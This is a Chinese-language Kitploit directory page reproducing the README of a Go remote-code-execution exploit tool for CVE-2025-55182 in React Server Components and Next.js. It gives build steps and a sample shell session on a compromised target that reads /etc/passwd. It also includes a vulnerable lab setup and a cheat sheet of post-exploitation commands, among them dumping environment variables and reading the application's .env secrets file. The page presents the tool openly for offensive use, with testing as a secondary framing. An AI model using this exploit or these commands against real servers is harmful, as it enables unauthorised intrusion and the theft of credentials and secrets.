Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-55182 — 针对CVE-2025-55182的RCE利用工具,该漏洞是React Server Components (RSC)中的一个严重漏洞,影响React 19.0.0 - 19.2.0及Next.js应用。 | Kitploit
工具/GitHubGitHub/yyax13/cve-2025-55182
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制红队Payload 开发
GitHubyyax13/cve-2025-55182

CVE-2025-55182

针对CVE-2025-55182的RCE利用工具,该漏洞是React Server Components (RSC)中的一个严重漏洞,影响React 19.0.0 - 19.2.0及Next.js应用。

查看仓库
129个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

👻 CVE-2025-55182 Go 漏洞利用工具

针对 CVE-2025-55182(React Server Components)的交互式 RCE 利用工具

GitHub Stars License Go

🎯 这是什么?

CVE-2025-55182 是一个轻量级交互式 RCE 利用工具,针对 CVE-2025-55182——React Server Components(RSC)中的一个严重漏洞,影响 React 19.0.0 - 19.2.0 及 Next.js 应用。


📦 安装

前置条件

  • Go 1.18 或更高版本
  • 运行 React 19.0.0 - 19.2.0 的脆弱目标

从源码构建

root@kitploit:~
git clone https://github.com/Hghost0x00/CVE-2025-55182.git
cd CVE-2025-55182
go build -o CVE-2025-55182 main.go

🚀 用法

基本用法

root@kitploit:~
./CVE-2025-55182

交互式会话

root@kitploit:~
_____________   _______________         _______________   ________   .________          .________.____________  ______  ________  
╲_   ___ ╲   ╲ ╱   ╱╲_   _____╱         ╲_____  ╲   _  ╲  ╲_____  ╲  │   ____╱          │   ____╱│   ____╱_   │╱  __  ╲ ╲_____  ╲ 
╱    ╲  ╲╱╲   Y   ╱  │    __)_   ______  ╱  ____╱  ╱_╲  ╲  ╱  ____╱  │____  ╲   ______  │____  ╲ │____  ╲ │   │>      <  ╱  ____╱ 
╲     ╲____╲     ╱   │        ╲ ╱_____╱ ╱       ╲  ╲_╱   ╲╱       ╲  ╱       ╲ ╱_____╱  ╱       ╲╱       ╲│   ╱   ──   ╲╱       ╲ 
 ╲______  ╱ ╲___╱   ╱_______  ╱         ╲_______ ╲_____  ╱╲_______ ╲╱______  ╱         ╱______  ╱______  ╱│___╲______  ╱╲_______ ╲
        ╲╱                  ╲╱                  ╲╱     ╲╱         ╲╱       ╲╱                 ╲╱       ╲╱            ╲╱         ╲╱  

    React2Shell RCE | CVE-2025-55182
    @hghost010

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[?] 目标: localhost:3000
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[+] 存在漏洞
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

ghost@rce $ id
uid=1000(node) gid=1000(node) groups=1000(node)

ghost@rce $ whoami
node

ghost@rce $ pwd
/app

ghost@rce $ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
node:x:1000:1000::/home/node:/bin/bash

ghost@rce $ exit

🎥 演示

https://github.com/user-attachments/assets/9cfdc436-9217-4921-bdbd-1368378f049f


受影响版本:

  • React 19.0.0、19.1.0、19.1.1、19.2.0
  • 使用这些 React 版本的 Next.js 应用

已修复版本:

  • React 19.2.1+
  • 更新了 React 依赖的 Next.js

🧪 测试实验室搭建

想安全测试?搭建一个脆弱实验室环境:

root@kitploit:~
# 克隆脆弱 Next.js 应用
git clone https://github.com/zack0x01/vuln-app-CVE-2025-55182.git
cd vuln-app-CVE-2025-55182

# 安装并运行
npm install --legacy-peer-deps
npm run dev

# 在另一个终端中,运行 ghost-scanner
./CVE-2025-55182
# 输入: localhost:3000

📚 常用命令

root@kitploit:~
ghost@rce $ id                    # 检查用户权限
ghost@rce $ whoami                # 当前用户名
ghost@rce $ pwd                   # 当前目录
ghost@rce $ ls -la                # 列出文件
ghost@rce $ cat /etc/passwd       # 读取文件
ghost@rce $ uname -a              # 系统信息
ghost@rce $ env                   # 环境变量
ghost@rce $ ps aux                # 运行中的进程
ghost@rce $ netstat -tulpn        # 网络连接
ghost@rce $ cat /app/.env         # 应用程序密钥

📊 仓库统计

GitHub repo size GitHub last commit GitHub issues


🔗 参考

  • CVE-2025-55182 详情
  • React 安全公告
  • Next.js 安全公告
  • maple3142 的原始 PoC
  • Assetnote 研究
  • 脆弱测试应用

💬 社区与支持

  • 🐦 Twitter/X: @hghost010
  • 🐙 GitHub: Hghost0x00

发现 bug? 提交 issue


⭐ 表达支持

如果这个工具对你有帮助:

  • ⭐ 给这个仓库点个星
  • 💬 分享给其他人

📝 许可证

本项目采用 MIT 许可证 - 详见 LICENSE 文件。


由 Hghost0x00 用 👻 制作
快乐黑客 ⚡

下载工具